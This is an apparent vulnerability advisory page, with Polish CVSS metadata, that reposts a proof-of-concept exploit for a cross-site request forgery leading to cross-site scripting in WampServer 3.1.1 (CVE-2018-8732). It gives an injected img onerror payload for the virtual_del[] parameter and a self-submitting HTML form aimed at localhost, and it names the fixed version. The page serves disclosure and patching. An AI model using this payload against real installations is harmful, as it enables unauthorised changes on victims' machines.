WampServer 3.1.1 Cross-Site Scripting / Cross-Site Request Forgery

2018.04.02
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


Ogólna skala CVSS: 3.5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 6.8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

# Exploit Title: WampServer 3.1.1 XSS via CSRF # Date: 31-03-2018 # Software Link: http://www.wampserver.com/en/ # Version: 3.1.1 # Tested On: Windows 10 # Exploit Author: Vipin Chaudhary # Contact: http://twitter.com/vipinxsec # Website: http://medium.com/@vipinxsec # CVE: CVE-2018-8732 1. Description XSS: cross site scripting via CSRF is remotely exploitable. http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615 http://forum.wampserver.com/read.php?2,150617 2. Proof of Concept How to exploit this XSS vulnerability: 1. Go to Add a Virtual host and add one to wampserver. 2. Go to Supress Virtual host and select one to delete and then intercept the request using burp suite or any other proxy tool 3. Change the value of parameter *virtual_del[] *to "><img src=x onerror=alert(1)> and forward it then you will see the XSS triggered. How to see it: 1. Copy and paste this CSRF request in notepad and save it as anything.html <html> <body onload="wamp_csrf.submit();"> <form action="[localhost]; name="wamp_csrf" method="POST"> <input type="hidden" name="virtual&#95;del&#91;&#93;" value=""><img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;>" /> <input type="hidden" name="vhostdelete" value="Suppress&#32;VirtualHost" /> </form> </body> </html> Warning: action="[localhost] is action=' http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by double quote("[image: winking smiley] 3. Solution: Update to version 3.1.3 http://www.wampserver.com/en/#download-wrapper


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top